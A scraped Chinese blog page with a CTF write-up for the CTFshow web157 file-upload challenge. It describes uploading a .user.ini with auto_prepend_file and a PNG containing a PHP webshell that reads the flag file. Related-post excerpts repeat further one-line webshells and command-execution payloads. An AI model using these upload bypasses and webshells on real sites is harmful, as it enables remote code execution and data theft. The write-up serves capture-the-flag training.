CTFshow 文件上传 web157

最新推荐文章于 2025-03-15 15:13:24 发布

Kradress

最新推荐文章于 2025-03-15 15:13:24 发布

阅读量607

点赞数

CC 4.0 BY-SA版权

分类专栏： CTFshow 文章标签： php 开发语言后端

本文链接：https://blog.csdn.net/Kracxi/article/details/122951176

CTFshow 专栏收录该内容

194 篇文章

订阅专栏

本文介绍了如何在CTF比赛中利用Burp Suite修改参数，通过闭合PHP标签来绕过后端过滤，成功上传.user.ini文件，并在后续上传shell.png时应对额外限制。最终通过访问/upload路径获得flag。

摘要生成于 C知道，由 DeepSeek-R1 满血版支持，前往体验 >

思路

直接在burp里面改target和host的值,或者在本地发包
在这里插入图片描述

成功上传.user.ini

auto_prepend_file=shell.png

在上传shell.png的时候,对比上题,;和反引号也不能用了,过滤;可以用闭合php标签用?>来绕过

shell.png

<?system('tac ../f*')?>

访问/upload,拿到flag

总结

…

确定要放弃本次机会？

福利倒计时

: :

立减 ¥

普通VIP年卡可用

立即使用

Kradress

关注关注

0
点赞
踩
0

收藏

觉得还不错? 一键收藏
0
评论
分享

复制链接

分享到 QQ

分享到新浪微博

扫一扫
举报

举报

专栏目录

ctfshow文件上传

weixin_53955759的博客

04-15

873

web151 前台校验不可靠，前端验证上传png，抓包改文件名为.php 成功，蚁剑连接得到falg web152 更改Content-Type即可蚁剑连接，得到flag web153 利用上传user.ini进行文件上传绕过。自 PHP 5.3.0 起，PHP 支持基于每个目录的 INI 文件配置。此类文件仅被 CGI／FastCGI SAPI 处理。此功能使得 PECL 的 htscanner 扩展作废。如果你的 PHP 以模块化运行在 Apache 里，则用 .htaccess 文件有同样

CTFSHOW 文件上传（学习记录）

ximo的博客

02-16

885

目录Web 151Web 152Web 153Web 154Web 155Web 156Web 157Web 158Web 159Web 160Web 161Web 162Web 163Web 164Web 165Web 166Web 167Web 168Web 169Web 170 Web 151 前端验证，抓包修改数据OK Web 152 直接上传一句话木马，连接即可 Web 153 参考链接： 文件上传漏洞——.htaccess和.user.ini配置文件的应用因为该环境是nginx搭建的，所以.h

参与评论您还未登录，请先登录后发表或查看评论

ctfhow——web入门157~163

最新发布

uwvwko的博客

03-15

990

eg: cp {file1,file2,file3}.txt backup/：将当前目录下文件名为file1.txt、file2.txt和file3.txt的文件复制到backup/目录。cp /home/user/*.jpg /home/user/photos/：将/home/user/目录下所有扩展名为.jpg的文件复制到/home/user/photos/目录。rm file[1-9].txt：删除当前目录下所有文件名格式为fileX.txt的文件，其中X可以是1到9之间的任意一个数字。

ctfshow WEB入门 文件上传151-170

byname1的博客

01-07

1899

只是过滤了分号，其他同上。php的最后一个分号可以省略。

CTFshow_Web_文件上传——web151~web170

Ho1aAs‘s Blog

04-26

2730

文章目录工具题解Web 151~152Web 153Web 154Web 155Web 156Web 157~158Web 159Web 160Web 161Web 162Web 163Web 164Web 165Web 166Web 167Web 168~170完工具 Burpsuite php 题解 Web 151~152 页面上，伪装成jpg的一句话木马无法上传，提示前后端验证抓包，修改filename为xxx.php，MIME类型image/png 读取flag直接用通配符 # 151.ph

CTFshow 文件上传 web163

Kradress的博客

02-16

761

目录源码思路总结源码思路先上传.user.ini 上传成功 GIF89a auto_prepend_file=png 然后上传png GIF89a <?=require~%9b%9e%8b%9e%c5%d0%d0%8b%9a%87%8b%d0%8f%93%9e%96%91%d3%c3%c0%8f%97%8f%df%8c%86%8c%8b%9a%92%d7%d8%8b%9e%9c%df%d1%d1%d0%99%d5%d8%d6%c4%c0%c1?> 取反脚本 $a = "dat

CTFshow 文件上传 web162

Kradress的博客

02-15

2296

目录思路总结思路大致思路和上题类似,不过在上传.user.ini的时候发现.被过滤了,可以把包含的文件不带后缀来绕过 .user.ini GIF89a auto_prepend_file=png png GIF89a <?=require~%9b%9e%8b%9e%c5%d0%d0%8b%9a%87%8b%d0%8f%93%9e%96%91%d3%c3%c0%8f%97%8f%df%8c%86%8c%8b%9a%92%d7%d8%8b%9e%9c%df%d1%d1%d0%99%d5%d8%

CTFshow 文件上传 Web151-170复现笔记（保姆级复现

2401_83728643的博客

12-31

1540

ctfshow文件上传复现保姆级笔记

CTFshow 文件上传 web164

Kradress的博客

02-16

1127

目录思路总结思路直接在burp里面改target和host的值,或者在本地发包多次尝试后,发现除了正常的png图片,都无法上传,猜测用图片马上传 https://github.com/huntergregal/PNG-IDAT-Payload-Generator 虽然上传成功,但把后缀改成任意字符串却被拦截,猜测是白名单 .user.ini也无法正常上传,应该有其他的点可以利用. 直接在网站上上传图片马后,发现显示查看图片点击查看图片后,跳转到/download.php?imag

CTFshow 文件上传 web168

Kradress的博客

02-17

468

目录思路总结思路先查看源代码,发现限制上传png 直接上传png的图片马,回显null,发现对eval,system还有$_POST和$_GET进行过滤,$_REQUEST还可以用替换图片马中的一句话,把文件后缀改成php,成功上传 <?php $_REQUEST[0]($_REQUEST[1]);?> 访问/upload/shell.php,直接rce拿到flag 总结 … ...

CTFshow-web入门-文件上传

weixin_44770698的博客

07-06

1348

CTFshow-文件上传

CTFshow Web入门 文件上传

m0_62905261的博客

10-05

973

CTFshow Web入门 文件上传

CTFShow-WEB入门篇文件上传详细Wp(151-170)

Aluxian_的博客

07-16

2814

【代码】CTFShow-WEB入门篇文件上传详细Wp(115-170)

ctfshow 文件上传 web151~170

shinygod的博客

03-22

1490

目录web151web 152web 153web 154web 155web 156 web151 上传提示，前端验证上传.jpg文件然后抓包，改文件名为.php,加入一句话木马。 upload/1.php?1=system("cat /var/www/html/flag.php"); web 152 同上，但对Content-Type进行了过滤。 upload/1.php?1=system("cat /var/www/html/flag.php"); web 153 过滤了php，大小写改一

CTF-show-文件上传

qq_52696970的博客

04-02

4600

文件上传1、web1512、web1523、web1534、web1545、web1556、web1567、web1578、web1589、web15910、web16011、web16112、web162 1、web151 （1）法一：抓包改后缀题目提示是前台校验，发现能上传图片，于是准备好的一句话木马改为png后缀上传再抓包 <?php @eval($_POST['x']);?> 将文件后缀修改为php再放包，可以看到文件上传成功上传成功后蚁剑连接即可得到flag （2）法二：禁J

ctfshow web入门 文件上传前篇(web151-web160)

ccfly1012的博客

09-17

1232

目录 web151-web152 web153 web154 web155 web156 web157-web159 web160 web161 web151-web152 首先写一个一句哈： <?php @eval($_POST["1"]);?> 然后修改文件后缀为png(题目限制)，上传文件同时进行抓包，然后修改后缀php，然后蚁剑连接，找到flag 拿到flag~~~~ web153 使用.user.ini绕过 .user.ini 摘抄...

文件上传+CTF题目

unexpectedthing的博客

10-27

2700

文章目录概念：文件上传绕过：1.绕过js代码：2.绕过服务端（MIME类型）3.绕过黑名单绕过白名单图片马文件上传后利用蚁剑进行连接后门概念： web客户端在上传文件时，没有对上传文件的内容，扩展名等进行过滤。 文件上传绕过： 1.绕过js代码：（1）一般的web网页前端在上传文件时，都会利用js代码对文件的扩展名。也就是说，如果对文件的扩展名进行过滤了，可能是js代码的作用了。（2）方法:利用火狐的about：config来禁用js代码执行。先使用可以使用的扩展名进行上传，利用bp抓包，改数据包扩

ctfshow web入门(文件上传)

Blazing-Angel的博客

07-19

2510

ctfshow 文件上传

ctfshow web入门 文件上传 web156-160

m0_62207170的博客

03-14

1254

ctfshow web入门 文件上传 web156-160

ctfshow web 157

07-28

引用\[2\]中提到了ctfshow的web157，但是没有提供具体的信息。请提供更多关于ctfshow web 157的内容。 #### 引用[.reference_title] - *1* [ctfshow 文件上传 web151~170](https://blog.csdn.net/shinygod/article/details/123669024)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v91^control_2,239^v3^insert_chatgpt"}} ] [.reference_item] - *2* *3* [ctfshow-web入门 文件上传篇部分题解](https://blog.csdn.net/weixin_45696568/article/details/114445971)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v91^control_2,239^v3^insert_chatgpt"}} ] [.reference_item] [ .reference_list ]